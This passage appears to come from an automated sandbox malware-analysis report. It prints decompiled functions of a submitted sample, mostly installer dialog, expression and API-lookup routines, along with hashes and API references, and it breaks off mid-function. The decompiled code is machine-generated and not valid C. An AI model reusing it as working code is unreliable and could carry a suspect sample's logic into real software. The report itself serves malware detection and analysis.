Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}

0x00404e7a
0x00404e7f
0x00404e87
0x00404e88
0x00404e95
0x00404e9d
0x00404e9e
0x00404ea0
0x00404ea2
0x00404ea4
0x00404ea7
0x00404ea7
0x00404eae
0x00404eb4
0x00404eb4
0x00404ebb
0x00404ec2
0x00404ec5
0x00404ec8
0x00404ec8
0x00404ecc
0x00404edc
0x00404ede
0x00404ee1
0x00404e8a
0x00404e8a
0x00404e91
0x00404e91
0x00404ee9
0x00404ef4
0x00404f0a
0x00404f1b
0x00404f37

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32 ref: 00404F2E

Strings

H7B, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Uniqueness

Uniqueness Score: -1.00%

Function 73BF1979 Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E73BF1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x73bf506c = _a8;
				_t77 = 0;
				 *0x73bf5070 = _a16;
				_v12 = 0;
				_v8 = E73BF12E3();
				_t90 = E73BF13B1(_t42);
				_t87 = _t85;
				_t81 = E73BF12E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E73BF12E3();
					_t77 = E73BF13B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73BF1510(_t85, _t90, _t87,  &_v76);
								E73BF1312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73BF3050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E73BF3070(_t59, _t83, _t85);
						} else {
							_t48 = E73BF30A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73BF2EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73BF2F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73BF2EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x73bf1979
0x73bf1983
0x73bf198c
0x73bf198f
0x73bf1994
0x73bf199d
0x73bf19a6
0x73bf19a8
0x73bf19af
0x73bf19b1
0x73bf19b4
0x73bf19bb
0x73bf19c9
0x73bf19d2
0x73bf19d7
0x73bf19da
0x73bf19e0
0x73bf19e0
0x73bf19e3
0x73bf19e6
0x73bf19e9
0x73bf1ab1
0x73bf1ab1
0x73bf1ab4
0x73bf1b34
0x73bf1b39
0x73bf1b48
0x73bf1b4b
0x73bf1b53
0x73bf1b53
0x73bf1b53
0x73bf1b55
0x73bf1b55
0x73bf1b56
0x73bf1b56
0x73bf1b58
0x73bf1b5a
0x73bf1b60
0x73bf1b69
0x73bf1b7a
0x73bf1b85
0x73bf1b85
0x73bf1b4d
0x73bf1b2f
0x73bf1b2f
0x73bf1b31
0x73bf1b31
0x00000000
0x73bf1b31
0x73bf1b4f
0x73bf1b51
0x00000000
0x00000000
0x00000000
0x73bf1b51
0x73bf1b3d
0x73bf1b41
0x00000000
0x73bf1b41
0x73bf1ab6
0x73bf1ab6
0x73bf1ab7
0x73bf1b26
0x73bf1b28
0x00000000
0x00000000
0x73bf1b2a
0x73bf1b2d
0x00000000
0x00000000
0x00000000
0x73bf1b2d
0x73bf1ab9
0x73bf1ab9
0x73bf1aba
0x73bf1af7
0x73bf1afc
0x73bf1b19
0x73bf1b1c
0x00000000
0x00000000
0x73bf1b1e
0x00000000
0x00000000
0x73bf1b20
0x73bf1b22
0x00000000
0x00000000
0x00000000
0x73bf1b24
0x73bf1afe
0x73bf1b03
0x73bf1b05
0x73bf1b07
0x73bf1b09
0x73bf1b12
0x73bf1b0b
0x73bf1b0b
0x73bf1b0b
0x00000000
0x73bf1b09
0x73bf1abc
0x73bf1abc
0x73bf1abf
0x73bf1af0
0x73bf1af2
0x00000000
0x73bf1af2
0x73bf1ac1
0x73bf1ac1
0x73bf1ac4
0x73bf1ad7
0x73bf1adc
0x73bf1ae9
0x73bf1aeb
0x00000000
0x73bf1aeb
0x73bf1ade
0x73bf1ae0
0x00000000
0x00000000
0x73bf1ae2
0x73bf1ae5
0x00000000
0x00000000
0x00000000
0x73bf1ae7
0x73bf1ac7
0x73bf1ac8
0x73bf1ace
0x73bf1ad0
0x73bf1ad0
0x00000000
0x73bf1ac8
0x73bf19ef
0x73bf1a68
0x73bf1a6a
0x73bf1a6d
0x73bf1a8b
0x73bf1a8e
0x73bf1a94
0x73bf1a99
0x73bf1a6f
0x73bf1a6f
0x73bf1a73
0x73bf1a77
0x73bf1a79
0x73bf1a79
0x73bf1a9c
0x73bf1aa0
0x00000000
0x73bf1aa6
0x73bf1aa6
0x73bf1aa9
0x00000000
0x73bf1aa9
0x73bf1aa0
0x73bf19f1
0x73bf19f4
0x73bf1a59
0x73bf1a5b
0x73bf1a5d
0x00000000
0x00000000
0x00000000
0x73bf1a63
0x73bf19f6
0x73bf19f9
0x00000000
0x00000000
0x73bf19fb
0x73bf19fc
0x73bf1a32
0x73bf1a37
0x73bf1a4f
0x73bf1a51
0x00000000
0x73bf1a51
0x73bf1a39
0x73bf1a3b
0x00000000
0x00000000
0x73bf1a41
0x73bf1a44
0x00000000
0x00000000
0x00000000
0x73bf1a4a
0x73bf19fe
0x73bf1a01
0x73bf1a28
0x00000000
0x73bf1a03
0x73bf1a03
0x73bf1a04
0x73bf1a18
0x73bf1a1a
0x73bf1a06
0x73bf1a08
0x73bf1a0e
0x73bf1a10
0x73bf1a10
0x73bf1a08
0x00000000
0x73bf1a04

APIs

GlobalFree.KERNEL32(?), ref: 73BF19DA
GlobalFree.KERNEL32(?), ref: 73BF1B7A
GlobalFree.KERNEL32(?), ref: 73BF1B7F

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 39f76c6b257754a8c326a892854aa46a94ed39b5072cd4485d0455e559b36c22
Instruction ID: 77d55cbb02bcdcd39ec9c62901e8f81b31eedbf604bce465ceeea23c05a2603c
Opcode Fuzzy Hash: 39f76c6b257754a8c326a892854aa46a94ed39b5072cd4485d0455e559b36c22
Instruction Fuzzy Hash: 55510572D0010BEBDB029FB4C44079DBBBAEBC0304F04B97AD506B3299F671AA4D8791

Uniqueness

Uniqueness Score: -1.00%

Function 73BF2480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E73BF2480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E73BF135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E73BF12E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M73BF25F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E73BF13B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E73BF13B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x73bf506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x73bf506c, __eax,  *0x73bf506c, 0, 0);
									goto L27;
								case 4:
									__eax = E73BF12CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E73BF13B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x73bf506c =  *0x73bf5074 + ( *(__esi + 0x18) - 1) *  *0x73bf506c * 2 + 0x18;
									 *__ebx =  *0x73bf5074 + ( *(__esi + 0x18) - 1) *  *0x73bf506c * 2 + 0x18;
									asm("cdq");
									__eax = E73BF1510(__edx,  *0x73bf5074 + ( *(__esi + 0x18) - 1) *  *0x73bf506c * 2 + 0x18, __edx,  *0x73bf5074 + ( *(__esi + 0x18) - 1) *  *0x73bf506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E73BF12CC(0x73bf5044);
					goto L10;
				}
			}

0x73bf2494
0x73bf2498
0x73bf24a3
0x73bf24a3
0x73bf24aa
0x73bf24af
0x00000000
0x00000000
0x73bf24b3
0x73bf24b6
0x00000000
0x00000000
0x73bf24bb
0x73bf24c6
0x73bf24d6
0x00000000
0x73bf24cd
0x73bf24cf
0x73bf24e5
0x00000000
0x73bf24e5
0x73bf24bd
0x73bf24bd
0x73bf24e6
0x73bf24e6
0x73bf24e8
0x73bf24ec
0x73bf24ec
0x73bf24ef
0x73bf24ef
0x73bf24f7
0x73bf24ff
0x73bf2502
0x73bf25c1
0x73bf25c2
0x73bf25cd
0x73bf25f7
0x73bf25f7
0x73bf25dd
0x73bf25e9
0x73bf25df
0x73bf25df
0x73bf25df
0x00000000
0x73bf2508
0x73bf2508
0x00000000
0x73bf250f
0x00000000
0x00000000
0x73bf2517
0x00000000
0x00000000
0x73bf2525
0x73bf2527
0x00000000
0x00000000
0x73bf2548
0x73bf254e
0x73bf2551
0x73bf2553
0x73bf2563
0x00000000
0x00000000
0x73bf2530
0x73bf2535
0x73bf2538
0x73bf2539
0x00000000
0x00000000
0x73bf256f
0x73bf2575
0x73bf2576
0x73bf2579
0x73bf257a
0x73bf257c
0x00000000
0x00000000
0x73bf2588
0x73bf258b
0x73bf2597
0x73bf2599
0x00000000
0x00000000
0x73bf25a5
0x73bf25b1
0x73bf25b4
0x73bf25b6
0x73bf25b9
0x00000000
0x00000000
0x73bf2508
0x73bf2502
0x73bf24db
0x73bf24e0
0x00000000
0x73bf24e0

APIs

GlobalFree.KERNEL32(00000000), ref: 73BF25C2

Part of subcall function 73BF12CC: lstrcpynW.KERNEL32(00000000,?,73BF137F,00000019,73BF11CA,-000000A0), ref: 73BF12DC

GlobalAlloc.KERNEL32(00000040), ref: 73BF2548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73BF2563

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: cdae4f27109b29e1ca19d5f748d2638e0f47cdf63113ea6a2b0c8c4a61930f14
Instruction ID: 50460446be16057c9c65ceb57418e1c1816d380c82b1e2eb32c7d21767b64763
Opcode Fuzzy Hash: cdae4f27109b29e1ca19d5f748d2638e0f47cdf63113ea6a2b0c8c4a61930f14
Instruction Fuzzy Hash: 3241A4B540470BEFE725DF35D890B2677B8FB84310F10693DE9468B681E7709548CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 73BF16BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73BF16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x73bf16d7
0x73bf16e3
0x73bf16f0
0x73bf16f7
0x73bf1700
0x73bf170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73BF22D8,?,00000808), ref: 73BF16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73BF22D8,?,00000808), ref: 73BF16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73BF22D8,?,00000808), ref: 73BF16F0
GetProcAddress.KERNEL32(73BF22D8,00000000,?,00000000,73BF22D8,?,00000808), ref: 73BF16F7
GlobalFree.KERNEL32(00000000), ref: 73BF1700

Memory Dump Source

Source File: 00000004.00000002.1181655845.0000000073BF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73BF0000, based on PE: true

Associated: 00000004.00000002.1181643941.0000000073BF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181681775.0000000073BF4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.1181696528.0000000073BF6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73bf0000_venxajlddf.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: befef53fcd695f6a6262bf66d736531ceaba5b817ef743f8fa2d305691a31423
Instruction ID: fb23dfe39c30c8b757ecab451621e09c2519dc85b2ad02dc09805e5c41e09cca
Opcode Fuzzy Hash: befef53fcd695f6a6262bf66d736531ceaba5b817ef743f8fa2d305691a31423
Instruction Fuzzy Hash: 95F0AC732061397BD63126BB8D4CD9BBE9CDF8B2F5B210215F62C9259086615D01D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
